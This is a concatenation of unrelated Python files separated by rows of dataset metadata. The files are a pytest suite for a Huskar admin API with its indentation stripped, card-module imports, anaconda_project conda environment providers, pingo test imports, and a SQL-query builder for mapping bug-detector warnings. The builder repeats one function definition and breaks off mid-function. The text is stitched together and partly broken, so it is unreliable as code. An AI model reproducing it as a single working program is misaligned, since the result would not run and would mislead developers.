from ..utils import assert_response_ok
def test_add_huskar_admin(client, db, last_audit_log, admin_token, test_user):
r = client.post('/api/auth/huskar', data={'username': test_user.username},
headers={'Authorization': admin_token})
assert r.status_code == 201
assert r.json['status'] == 'SUCCESS'
assert db.query(User.huskar_admin).filter_by(
username=test_user.username).scalar() == 1
audit_log = last_audit_log()
assert audit_log.action_name == 'GRANT_HUSKAR_ADMIN'
assert audit_log.action_json['username'] == test_user.username
def test_add_huskar_admin_twice(
client, db, last_audit_log, admin_token, test_user):
test_user.grant_admin()
r = client.post('/api/auth/huskar', data={'username': test_user.username},
headers={'Authorization': admin_token})
assert_response_ok(r)
assert last_audit_log() is None
def test_add_huskar_admin_not_found(
client, db, faker, last_audit_log, admin_token):
username = faker.uuid4()
r = client.post('/api/auth/huskar', data={'username': username},
headers={'Authorization': admin_token})
assert r.status_code == 404
assert r.json['status'] == 'NotFound'
assert r.json['message'] == 'user "%s" is not found' % username
assert last_audit_log() is None
def test_add_huskar_admin_without_authority(
client, last_audit_log, test_token, test_user):
r = client.post('/api/auth/huskar', data={'username': test_user.username},
headers={'Authorization': test_token})
assert r.status_code == 400
assert r.json['status'] == 'NoAuthError'
assert last_audit_log() is None
def test_delete_huskar_admin(
client, db, last_audit_log, admin_token, test_user):
test_user.grant_admin()
r = client.delete('/api/auth/huskar/%s' % test_user.username,
headers={'Authorization': admin_token})
assert_response_ok(r)
assert db.query(User.huskar_admin).filter_by(
username=test_user.username).scalar() == 0
audit_log = last_audit_log()
assert audit_log.action_name == 'DISMISS_HUSKAR_ADMIN'
assert audit_log.action_json['username'] == test_user.username
def test_delete_huskar_admin_himself(
client, db, last_audit_log, admin_user, admin_token):
r = client.delete('/api/auth/huskar/%s' % admin_user.username,
headers={'Authorization': admin_token})
assert r.status_code == 403
assert r.json['status'] == 'Forbidden'
assert db.query(User.huskar_admin).filter_by(
username=admin_user.username).scalar() == 1
assert last_audit_log() is None
def test_delete_huskar_admin_without_authority(
client, last_audit_log, test_token, test_user, admin_user):
r = client.delete('/api/auth/huskar/%s' % admin_user.username,
headers={'Authorization': test_token})
assert r.status_code == 400
assert r.json['status'] == 'NoAuthError'
assert last_audit_log() is None
| 38.530864
| 78
| 0.685037
| 418
| 3,121
| 4.803828
| 0.150718
| 0.079681
| 0.083665
| 0.083665
| 0.835159
| 0.803785
| 0.791335
| 0.781375
| 0.763446
| 0.714143
| 0
| 0.007552
| 0.193848
| 3,121
| 80
| 79
| 39.0125
| 0.790541
| 0
| 0
| 0.539683
| 0
| 0
| 0.129125
| 0
| 0
| 0
| 0
| 0
| 0.412698
| 1
| 0.111111
| false
| 0
| 0.047619
| 0
| 0.15873
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71f9920e5b2b898211cde1ffa1f9634ead9a15fd
| 260
|
py
|
Python
|
entity/cards/LETL_015H/__init__.py
|
x014/lushi_script
|
edab2b88e3f0de8139de2541ab2daa331f777c0e
|
[
"MIT"
] | 102
|
2021-10-20T09:06:39.000Z
|
2022-03-28T13:35:11.000Z
|
entity/cards/LETL_015H/__init__.py
|
x014/lushi_script
|
edab2b88e3f0de8139de2541ab2daa331f777c0e
|
[
"MIT"
] | 98
|
2021-10-19T16:13:27.000Z
|
2022-03-27T13:27:49.000Z
|
entity/cards/LETL_015H/__init__.py
|
x014/lushi_script
|
edab2b88e3f0de8139de2541ab2daa331f777c0e
|
[
"MIT"
] | 55
|
2021-10-19T03:56:50.000Z
|
2022-03-25T08:25:26.000Z
|
# -*- coding: utf-8 -*-
import entity.cards.LETL_015H.LETL_262
import entity.cards.LETL_015H.LETL_263
import entity.cards.LETL_015H.LETL_015P9
import entity.cards.LETL_015H.LETL_265
import entity.cards.LETL_015H.LETL_266
import entity.cards.LETL_015H.LETL_267
| 32.5
| 40
| 0.830769
| 45
| 260
| 4.533333
| 0.311111
| 0.352941
| 0.5
| 0.617647
| 0.852941
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0.156379
| 0.065385
| 260
| 7
| 41
| 37.142857
| 0.683128
| 0.080769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
9c0b519220a3fc4a233126ea46add87f819c61b3
| 19,314
|
py
|
Python
|
anaconda_project/requirements_registry/providers/conda_env.py
|
vertingo/Anaconda_Videos_Tutos
|
f30f2a0549a7b81c17f4d5d249edc59eb3c05458
|
[
"BSD-3-Clause"
] | null | null | null |
anaconda_project/requirements_registry/providers/conda_env.py
|
vertingo/Anaconda_Videos_Tutos
|
f30f2a0549a7b81c17f4d5d249edc59eb3c05458
|
[
"BSD-3-Clause"
] | null | null | null |
anaconda_project/requirements_registry/providers/conda_env.py
|
vertingo/Anaconda_Videos_Tutos
|
f30f2a0549a7b81c17f4d5d249edc59eb3c05458
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
"""Conda environment providers."""
from __future__ import absolute_import, print_function
import os
import shutil
from anaconda_project.internal import conda_api
from anaconda_project.internal.simple_status import SimpleStatus
from anaconda_project.conda_manager import new_conda_manager, CondaManagerError
from anaconda_project.requirements_registry.provider import EnvVarProvider
from anaconda_project.provide import PROVIDE_MODE_CHECK
def _remove_env_path(env_path):
"""Also used by project_ops.py to delete environment files."""
if os.path.exists(env_path):
try:
shutil.rmtree(env_path)
return SimpleStatus(success=True, description=("Deleted environment files in %s." % env_path))
except Exception as e:
problem = "Failed to remove environment files in {}: {}.".format(env_path, str(e))
return SimpleStatus(success=False, description=problem)
else:
return SimpleStatus(success=True,
description=("Nothing to clean up for environment '%s'." % os.path.basename(env_path)))
class CondaEnvProvider(EnvVarProvider):
"""Provides a Conda environment."""
def __init__(self):
"""Override to create our CondaManager."""
super(CondaEnvProvider, self).__init__()
def missing_env_vars_to_configure(self, requirement, environ, local_state_file):
"""Override superclass to not require ourselves."""
return ()
def missing_env_vars_to_provide(self, requirement, environ, local_state_file):
"""Override superclass to not require ourselves."""
return self.missing_env_vars_to_configure(requirement, environ, local_state_file)
def read_config(self, requirement, environ, local_state_file, default_env_spec_name, overrides):
"""Override superclass to add a choice to create a project-scoped environment."""
assert 'PROJECT_DIR' in environ
project_dir = environ['PROJECT_DIR']
if overrides.env_spec_name is not None:
# short-circuit this whole party
env = requirement.env_specs.get(overrides.env_spec_name)
# future: it should be possible to override the env spec without using the
# default-created project-scoped env.
config = dict(source='project', env_name=overrides.env_spec_name, value=env.path(project_dir))
return config
config = super(CondaEnvProvider, self).read_config(requirement, environ, local_state_file,
default_env_spec_name, overrides)
assert 'source' in config
# we don't support a default here because it would
# need a hardcoded path which the anaconda-project.yml author
# would have no way of providing. Fortunately there's
# no syntax in anaconda-project.yml that should result in setting
# a default.
assert config['source'] != 'default'
if config['source'] == 'unset':
# if nothing is selected, default to project mode
# because we don't have a radio button in the UI for
# "do nothing" right now.
config['source'] = 'project'
# if we're supposed to inherit the environment, we don't want to look at
# anything else. This should always get rid of 'environ' source.
if local_state_file.get_value('inherit_environment', default=False) and overrides.inherited_env is not None:
config['source'] = 'inherited'
config['value'] = overrides.inherited_env
# convert 'environ' to 'project' when needed... this would
# happen if you keep the default 'project' choice, so
# there's nothing in anaconda-project-local.yml
if config['source'] == 'environ':
environ_value = config['value']
project_dir = environ['PROJECT_DIR']
environ_value_is_project_specific = False
for env in requirement.env_specs.values():
if env.path(project_dir) == environ_value:
environ_value_is_project_specific = True
assert environ_value_is_project_specific
config['source'] = 'project'
# we should have changed 'environ' to the specific source; since for conda envs
# we ignore the initial environ value, we always have to track our value in
assert config['source'] != 'environ'
# be sure we don't get confused by alternate ways to spell the path
if 'value' in config:
config['value'] = os.path.normpath(config['value'])
config['env_name'] = default_env_spec_name
if 'value' in config:
for env in requirement.env_specs.values():
if config['value'] == env.path(project_dir):
config['env_name'] = env.name
if config['source'] == 'variables':
config['source'] = 'project'
elif config['source'] == 'project':
env = requirement.env_specs.get(config['env_name'])
config['value'] = env.path(project_dir)
assert 'env_name' in config
# print("read_config " + repr(config))
return config
def set_config_values_as_strings(self, requirement, environ, local_state_file, default_env_spec_name, overrides,
values):
"""Override superclass to support 'project' source option."""
super(CondaEnvProvider, self).set_config_values_as_strings(requirement, environ, local_state_file,
default_env_spec_name, overrides, values)
# We have to clear out the user override or it will
# never stop overriding the user's new choice, if they
# have changed to another env.
overrides.env_spec_name = None
if 'source' in values:
if values['source'] == 'inherited':
local_state_file.set_value('inherit_environment', True)
# the superclass should have unset this so we inherit instead of using it
assert local_state_file.get_value(['variables', requirement.env_var]) is None
else:
# don't write this out if it wasn't in there anyway
if local_state_file.get_value('inherit_environment') is not None:
local_state_file.set_value('inherit_environment', False)
if values['source'] == 'project':
project_dir = environ['PROJECT_DIR']
name = values['env_name']
for env in requirement.env_specs.values():
if env.name == name:
prefix = env.path(project_dir)
local_state_file.set_value(['variables', requirement.env_var], prefix)
def provide(self, requirement, context):
"""Override superclass to create or update our environment."""
assert 'PATH' in context.environ
conda = new_conda_manager(context.frontend)
# set from the inherited vale if necessary
if context.status.analysis.config['source'] == 'inherited':
context.environ[requirement.env_var] = context.status.analysis.config['value']
# set the env var (but not PATH, etc. to fully activate, that's done below)
super_result = super(CondaEnvProvider, self).provide(requirement, context)
project_dir = context.environ['PROJECT_DIR']
env_name = context.status.analysis.config.get('env_name', context.default_env_spec_name)
env_spec = requirement.env_specs.get(env_name)
if context.status.analysis.config['source'] == 'inherited':
prefix = context.environ.get(requirement.env_var, None)
inherited = True
else:
prefix = None
inherited = False
if prefix is None:
# use the default environment
prefix = env_spec.path(project_dir)
assert prefix is not None
# if the value has changed, choose the matching env spec
# (something feels wrong here; should this be in read_config?
# or not at all?)
for env in requirement.env_specs.values():
if env.path(project_dir) == prefix:
env_spec = env
break
if context.mode != PROVIDE_MODE_CHECK:
# we update the environment in both prod and dev mode
# TODO if not creating a named env, we could use the
# shared packages, but for now we leave it alone
assert env_spec is not None
try:
conda.fix_environment_deviations(prefix, env_spec, create=(not inherited))
except CondaManagerError as e:
return super_result.copy_with_additions(errors=[str(e)])
conda_api.environ_set_prefix(context.environ, prefix, varname=requirement.env_var)
path = context.environ.get("PATH", "")
context.environ["PATH"] = conda_api.set_conda_env_in_path(path, prefix)
# Some stuff can only be done when a shell is launched:
# - we can't set PS1 because it shouldn't be exported.
# - we can't run conda activate scripts because they are sourced.
# We can do these in the output of our activate command, but not here.
return super_result
def unprovide(self, requirement, environ, local_state_file, overrides, requirement_status=None):
"""Override superclass to delete project-scoped envs directory."""
config = self.read_config(requirement,
environ,
local_state_file,
# future: pass in this default_env_spec_name
default_env_spec_name='default',
overrides=overrides)
env_path = config.get('value', None)
assert env_path is not None
project_dir = environ['PROJECT_DIR']
if not env_path.startswith(project_dir):
return SimpleStatus(success=True,
description=("Current environment is not in %s, no need to delete it." % project_dir))
return _remove_env_path(env_path)
class CondaBootstrapEnvProvider(EnvVarProvider):
"""Provides a Conda environment."""
def __init__(self):
"""Override to create our CondaManager."""
super(CondaBootstrapEnvProvider, self).__init__()
def missing_env_vars_to_configure(self, requirement, environ, local_state_file):
"""Override superclass to not require ourselves."""
return ()
def missing_env_vars_to_provide(self, requirement, environ, local_state_file):
"""Override superclass to not require ourselves."""
return self.missing_env_vars_to_configure(requirement, environ, local_state_file)
def read_config(self, requirement, environ, local_state_file, default_env_spec_name, overrides):
"""Override superclass to add a choice to create a project-scoped environment."""
assert 'PROJECT_DIR' in environ
project_dir = environ['PROJECT_DIR']
if overrides.env_spec_name is not None:
# short-circuit this whole party
env = requirement.env_specs.get(overrides.env_spec_name)
# future: it should be possible to override the env spec without using the
# default-created project-scoped env.
config = dict(source='project', env_name=overrides.env_spec_name, value=env.path(project_dir))
return config
config = super(CondaBootstrapEnvProvider, self).read_config(requirement, environ, local_state_file,
default_env_spec_name, overrides)
assert 'source' in config
if config['source'] == 'unset':
# if nothing is selected, default to project mode
# because we don't have a radio button in the UI for
# "do nothing" right now.
config['source'] = 'project'
# if we're supposed to inherit the environment, we don't want to look at
# anything else. This should always get rid of 'environ' source.
if local_state_file.get_value('inherit_environment', default=False) and overrides.inherited_env is not None:
config['source'] = 'inherited'
config['value'] = overrides.inherited_env
# convert 'environ' to 'project' when needed... this would
# happen if you keep the default 'project' choice, so
# there's nothing in anaconda-project-local.yml
if config['source'] == 'environ':
environ_value = config['value']
project_dir = environ['PROJECT_DIR']
environ_value_is_project_specific = False
for env in requirement.env_specs.values():
if env.path(project_dir) == environ_value:
environ_value_is_project_specific = True
assert environ_value_is_project_specific
config['source'] = 'project'
# we should have changed 'environ' to the specific source; since for conda envs
# we ignore the initial environ value, we always have to track our value in
assert config['source'] != 'environ'
# be sure we don't get confused by alternate ways to spell the path
if 'value' in config:
config['value'] = os.path.normpath(config['value'])
config['env_name'] = default_env_spec_name
assert config['env_name'] == 'bootstrap-env'
if 'value' in config:
for env in requirement.env_specs.values():
if config['value'] == env.path(project_dir):
config['env_name'] = env.name
if config['source'] == 'variables':
config['source'] = 'project'
elif config['source'] == 'project':
env = requirement.env_specs.get(config['env_name'])
config['value'] = env.path(project_dir)
assert 'env_name' in config
return config
def set_config_values_as_strings(self, requirement, environ, local_state_file, default_env_spec_name, overrides,
values):
"""Override superclass to support 'project' source option."""
super(CondaBootstrapEnvProvider, self).set_config_values_as_strings(requirement, environ, local_state_file,
default_env_spec_name, overrides, values)
# We have to clear out the user override or it will
# never stop overriding the user's new choice, if they
# have changed to another env.
overrides.env_spec_name = None
if 'source' in values:
if values['source'] == 'inherited':
local_state_file.set_value('inherit_environment', True)
# the superclass should have unset this so we inherit instead of using it
assert local_state_file.get_value(['variables', requirement.env_var]) is None
else:
# don't write this out if it wasn't in there anyway
if local_state_file.get_value('inherit_environment') is not None:
local_state_file.set_value('inherit_environment', False)
if values['source'] == 'project':
project_dir = environ['PROJECT_DIR']
name = values['env_name']
for env in requirement.env_specs.values():
if env.name == name:
prefix = env.path(project_dir)
local_state_file.set_value(['variables', requirement.env_var], prefix)
def provide(self, requirement, context):
"""Override superclass to create or update our environment."""
assert 'PATH' in context.environ
conda = new_conda_manager(context.frontend)
# set from the inherited vale if necessary
if context.status.analysis.config['source'] == 'inherited':
context.environ[requirement.env_var] = context.status.analysis.config['value']
# set the env var (but not PATH, etc. to fully activate, that's done below)
super_result = super(CondaBootstrapEnvProvider, self).provide(requirement, context)
project_dir = context.environ['PROJECT_DIR']
env_name = context.status.analysis.config.get('env_name', context.default_env_spec_name)
env_spec = requirement.env_specs.get(env_name)
prefix = os.path.join(project_dir, 'envs', 'bootstrap-env')
# if the value has changed, choose the matching env spec
# (something feels wrong here; should this be in read_config?
# or not at all?)
for env in requirement.env_specs.values():
if env.path(project_dir) == prefix:
env_spec = env
break
if context.mode != PROVIDE_MODE_CHECK:
# we update the environment in both prod and dev mode
# TODO if not creating a named env, we could use the
# shared packages, but for now we leave it alone
assert env_spec is not None
try:
conda.fix_environment_deviations(prefix, env_spec, create=True)
except CondaManagerError as e:
return super_result.copy_with_additions(errors=[str(e)])
conda_api.environ_set_prefix(context.environ, prefix, varname=requirement.env_var)
path = context.environ.get("PATH", "")
context.environ["PATH"] = conda_api.set_conda_env_in_path(path, prefix)
# Some stuff can only be done when a shell is launched:
# - we can't set PS1 because it shouldn't be exported.
# - we can't run conda activate scripts because they are sourced.
# We can do these in the output of our activate command, but not here.
return super_result
def unprovide(self, requirement, environ, local_state_file, overrides, requirement_status=None):
"""Override superclass to delete project-scoped envs directory."""
config = self.read_config(requirement,
environ,
local_state_file,
# future: pass in this default_env_spec_name
default_env_spec_name='bootstrap-env',
overrides=overrides)
env_path = config.get('value', None)
assert env_path is not None
project_dir = environ['PROJECT_DIR']
if not env_path.startswith(project_dir):
return SimpleStatus(success=True,
description=("Current environment is not in %s, no need to delete it." % project_dir))
return _remove_env_path(env_path)
| 46.427885
| 118
| 0.621466
| 2,309
| 19,314
| 5.018623
| 0.124729
| 0.034518
| 0.036244
| 0.043493
| 0.865982
| 0.856748
| 0.856748
| 0.852951
| 0.852951
| 0.852951
| 0
| 0.000582
| 0.288444
| 19,314
| 415
| 119
| 46.539759
| 0.842611
| 0.257844
| 0
| 0.828326
| 0
| 0
| 0.085839
| 0
| 0
| 0
| 0
| 0.00241
| 0.090129
| 1
| 0.064378
| false
| 0
| 0.034335
| 0
| 0.188841
| 0.004292
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c3a5d6b0e883d69a8262494aae80fc29d783627
| 64
|
py
|
Python
|
pingo/test/level0/__init__.py
|
willingc/pingo
|
0890bf5ed763e9061320093fc3fb5f7543c5cc2c
|
[
"MIT"
] | null | null | null |
pingo/test/level0/__init__.py
|
willingc/pingo
|
0890bf5ed763e9061320093fc3fb5f7543c5cc2c
|
[
"MIT"
] | null | null | null |
pingo/test/level0/__init__.py
|
willingc/pingo
|
0890bf5ed763e9061320093fc3fb5f7543c5cc2c
|
[
"MIT"
] | null | null | null |
from cases import BoardBasics
from cases import BoardExceptions
| 21.333333
| 33
| 0.875
| 8
| 64
| 7
| 0.625
| 0.321429
| 0.535714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 64
| 2
| 34
| 32
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c7eab96454423ada5677490d4dfc632f2bf0a5c
| 12,457
|
py
|
Python
|
scripts/database/mapping_methods.py
|
patrickjchap/Static-Bug-Detectors-ASE-Artifact
|
9104a6c9d8105725d3f2351893ff3f4022b02faa
|
[
"BSD-3-Clause"
] | 1
|
2022-01-07T09:32:48.000Z
|
2022-01-07T09:32:48.000Z
|
scripts/database/mapping_methods.py
|
patrickjchap/Static-Bug-Detectors-ASE-Artifact
|
9104a6c9d8105725d3f2351893ff3f4022b02faa
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/database/mapping_methods.py
|
patrickjchap/Static-Bug-Detectors-ASE-Artifact
|
9104a6c9d8105725d3f2351893ff3f4022b02faa
|
[
"BSD-3-Clause"
] | 1
|
2021-11-19T00:33:30.000Z
|
2021-11-19T00:33:30.000Z
|
'''
Contains functions for generating the different database queries for
each respective mapping method.
'''
def generate_code_diff_query(diff_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{diff_table}` INNER JOIN `{tool_table}` ON ' \
'`{diff_table}`.image_tag = `{tool_table}`.image_tag WHERE ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND ' \
'LOCATE(`{diff_table}`.file,`{tool_table}`.file) != "" or ' \
'LOCATE(`{tool_table}`.file,`{diff_table}`.file) != "" AND ' \
'(((`{tool_table}`.bug_lower BETWEEN `{diff_table}`.patch_lower AND ' \
'`{diff_table}`.patch_upper) OR (`{tool_table}`.bug_upper BETWEEN ' \
'`{diff_table}`.patch_lower AND `{diff_table}`.patch_upper)) OR ' \
'((`{diff_table}`.patch_lower BETWEEN `{tool_table}`.bug_lower AND ' \
'`{tool_table}`.bug_upper) OR (`{diff_table}`.patch_lower BETWEEN ' \
'`{tool_table}`.bug_lower AND `{tool_table}`.bug_upper)));'.format(**{
'diff_table': diff_table,
'tool_table': tool_table,
})
def generate_code_diff_query_infer(diff_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{diff_table}` INNER JOIN `{tool_table}` ON ' \
'`{diff_table}`.image_tag = `{tool_table}`.image_tag WHERE ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND ' \
'`{tool_table}`.bug_type = "NULL_DEREFERENCE" AND ' \
'LOCATE(`{diff_table}`.file,`{tool_table}`.file) != "" or ' \
'LOCATE(`{tool_table}`.file,`{diff_table}`.file) != "" AND ' \
'(((`{tool_table}`.bug_lower BETWEEN `{diff_table}`.patch_lower AND ' \
'`{diff_table}`.patch_upper) OR (`{tool_table}`.bug_upper BETWEEN ' \
'`{diff_table}`.patch_lower AND `{diff_table}`.patch_upper)) OR ' \
'((`{diff_table}`.patch_lower BETWEEN `{tool_table}`.bug_lower AND ' \
'`{tool_table}`.bug_upper) OR (`{diff_table}`.patch_lower BETWEEN ' \
'`{tool_table}`.bug_lower AND `{tool_table}`.bug_upper)));'.format(**{
'diff_table': diff_table,
'tool_table': tool_table,
})
def generate_code_diff_query_spotbugs(diff_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{diff_table}` INNER JOIN `{tool_table}` ON ' \
'`{diff_table}`.image_tag = `{tool_table}`.image_tag WHERE ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND ' \
'LOCATE( "NP_",`{tool_table}`.bug_type) != "" AND ' \
'LOCATE(`{diff_table}`.file,`{tool_table}`.file) != "" or ' \
'LOCATE(`{tool_table}`.file,`{diff_table}`.file) != "" AND ' \
'(((`{tool_table}`.bug_lower BETWEEN `{diff_table}`.patch_lower AND ' \
'`{diff_table}`.patch_upper) OR (`{tool_table}`.bug_upper BETWEEN ' \
'`{diff_table}`.patch_lower AND `{diff_table}`.patch_upper)) OR ' \
'((`{diff_table}`.patch_lower BETWEEN `{tool_table}`.bug_lower AND ' \
'`{tool_table}`.bug_upper) OR (`{diff_table}`.patch_lower BETWEEN ' \
'`{tool_table}`.bug_lower AND `{tool_table}`.bug_upper)));'.format(**{
'diff_table': diff_table,
'tool_table': tool_table,
})
def generate_code_diff_query_infer(diff_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{diff_table}` INNER JOIN `{tool_table}` ON ' \
'`{diff_table}`.image_tag = `{tool_table}`.image_tag WHERE ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND ' \
'`{tool_table}`.bug_type = "NULL_DEREFERENCE" AND ' \
'LOCATE(`{diff_table}`.file,`{tool_table}`.file) != "" or ' \
'LOCATE(`{tool_table}`.file,`{diff_table}`.file) != "" AND ' \
'(((`{tool_table}`.bug_lower BETWEEN `{diff_table}`.patch_lower AND ' \
'`{diff_table}`.patch_upper) OR (`{tool_table}`.bug_upper BETWEEN ' \
'`{diff_table}`.patch_lower AND `{diff_table}`.patch_upper)) OR ' \
'((`{diff_table}`.patch_lower BETWEEN `{tool_table}`.bug_lower AND ' \
'`{tool_table}`.bug_upper) OR (`{diff_table}`.patch_lower BETWEEN ' \
'`{tool_table}`.bug_lower AND `{tool_table}`.bug_upper)));'.format(**{
'diff_table': diff_table,
'tool_table': tool_table,
})
def generate_covered_lines_query(covered_lines_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{covered_lines_table}` INNER JOIN `{tool_table}` ON ' \
'`{covered_lines_table}`.image_tag = `{tool_table}`.image_tag WHERE ' \
'LOCATE(`{covered_lines_table}`.file,`{tool_table}`.file) != "" AND ' \
'(((`{tool_table}`.bug_lower BETWEEN `{covered_lines_table}`.line AND ' \
'`{covered_lines_table}`.line) OR (`{tool_table}`.bug_upper BETWEEN ' \
'`{covered_lines_table}`.line AND `{covered_lines_table}`.line)) OR ' \
'((`{covered_lines_table}`.line BETWEEN `{tool_table}`.bug_lower AND ' \
'`{tool_table}`.bug_upper) OR (`{covered_lines_table}`.line BETWEEN ' \
'`{tool_table}`.bug_lower AND `{tool_table}`.bug_upper)));'.format(**{
'covered_lines_table': covered_lines_table,
'tool_table': tool_table,
})
def generate_covered_lines_original_query_infer(covered_lines_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{tool_table}` INNER JOIN `{covered_lines_table}` ON ' \
'`{tool_table}`.image_tag = `{covered_lines_table}`.image_tag AND '\
'`{covered_lines_table}`.line = `{tool_table}`.bug_upper AND ' \
'`{covered_lines_table}`.line = `{tool_table}`.bug_lower AND ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND (LOCATE(`{covered_lines_table}`.file,`{tool_table}`.file) != "" OR LOCATE(`{tool_table}`.file, `{covered_lines_table}`.file) != "") AND `{tool_table}`.bug_type = "NULL_DEREFERENCE";'.format(**{
'covered_lines_table': covered_lines_table,
'tool_table': tool_table,
})
def generate_covered_lines_original_query(covered_lines_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{tool_table}` INNER JOIN `{covered_lines_table}` ON ' \
'`{tool_table}`.image_tag = `{covered_lines_table}`.image_tag AND '\
'`{covered_lines_table}`.line = `{tool_table}`.bug_upper AND ' \
'`{covered_lines_table}`.line = `{tool_table}`.bug_lower AND ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND (LOCATE(`{covered_lines_table}`.file,`{tool_table}`.file) != "" OR LOCATE(`{tool_table}`.file, `{covered_lines_table}`.file) != "");'.format(**{
'covered_lines_table': covered_lines_table,
'tool_table': tool_table,
})
def generate_covered_lines_original_query_spotbugs(covered_lines_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{tool_table}` INNER JOIN `{covered_lines_table}` ON ' \
'`{tool_table}`.image_tag = `{covered_lines_table}`.image_tag AND '\
'`{covered_lines_table}`.line = `{tool_table}`.bug_upper AND ' \
'`{covered_lines_table}`.line = `{tool_table}`.bug_lower AND ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND (LOCATE(`{covered_lines_table}`.file,`{tool_table}`.file) != "" OR LOCATE(`{tool_table}`.file, `{covered_lines_table}`.file) != "") AND LOCATE( "NP_",`{tool_table}`.bug_type) != "";'.format(**{
'covered_lines_table': covered_lines_table,
'tool_table': tool_table,
})
def generate_stack_trace_query(stack_trace_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{stack_trace_table}` INNER JOIN `{tool_table}` ON ' \
'`{stack_trace_table}`.image_tag = `{tool_table}`.image_tag WHERE ' \
'LOCATE(`{stack_trace_table}`.file,`{tool_table}`.file) != "" AND ' \
'(((`{tool_table}`.bug_lower BETWEEN `{stack_trace_table}`.line AND ' \
'`{stack_trace_table}`.line) OR (`{tool_table}`.bug_upper BETWEEN ' \
'`{stack_trace_table}`.line AND `{stack_trace_table}`.line)) OR ' \
'((`{stack_trace_table}`.line BETWEEN `{tool_table}`.bug_lower AND ' \
'`{tool_table}`.bug_upper) OR (`{stack_trace_table}`.line BETWEEN ' \
'`{tool_table}`.bug_lower AND `{tool_table}`.bug_upper)));'.format(**{
'stack_trace_table': stack_trace_table,
'tool_table': tool_table,
})
def generate_stack_trace_original_query_infer(stack_trace_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{tool_table}` INNER JOIN `{stack_trace_table}` ON ' \
'`{tool_table}`.image_tag = `{stack_trace_table}`.image_tag AND '\
'`{stack_trace_table}`.line = `{tool_table}`.bug_upper AND ' \
'`{stack_trace_table}`.line = `{tool_table}`.bug_lower AND ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND (LOCATE(`{stack_trace_table}`.file,`{tool_table}`.file) != "" OR LOCATE(`{tool_table}`.file, `{stack_trace_table}`.file) != "") AND `{tool_table}`.bug_type = "NULL_DEREFERENCE";'.format(**{
'stack_trace_table': stack_trace_table,
'tool_table': tool_table,
})
def generate_stack_trace_original_query(stack_trace_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{tool_table}` INNER JOIN `{stack_trace_table}` ON ' \
'`{tool_table}`.image_tag = `{stack_trace_table}`.image_tag AND '\
'`{stack_trace_table}`.line = `{tool_table}`.bug_upper AND ' \
'`{stack_trace_table}`.line = `{tool_table}`.bug_lower AND ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND (LOCATE(`{stack_trace_table}`.file,`{tool_table}`.file) != "" OR LOCATE(`{tool_table}`.file, `{stack_trace_table}`.file) != "");'.format(**{
'stack_trace_table': stack_trace_table,
'tool_table': tool_table,
})
def generate_stack_trace_original_query_spotbugs(stack_trace_table: str, tool_table: str) -> str:
return 'SELECT * FROM `{tool_table}` INNER JOIN `{stack_trace_table}` ON ' \
'`{tool_table}`.image_tag = `{stack_trace_table}`.image_tag AND '\
'`{stack_trace_table}`.line = `{tool_table}`.bug_upper AND ' \
'`{stack_trace_table}`.line = `{tool_table}`.bug_lower AND ' \
'(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND (LOCATE(`{stack_trace_table}`.file,`{tool_table}`.file) != "" OR LOCATE(`{tool_table}`.file, `{stack_trace_table}`.file) != "") AND LOCATE( "NP_",`{tool_table}`.bug_type) != "";'.format(**{
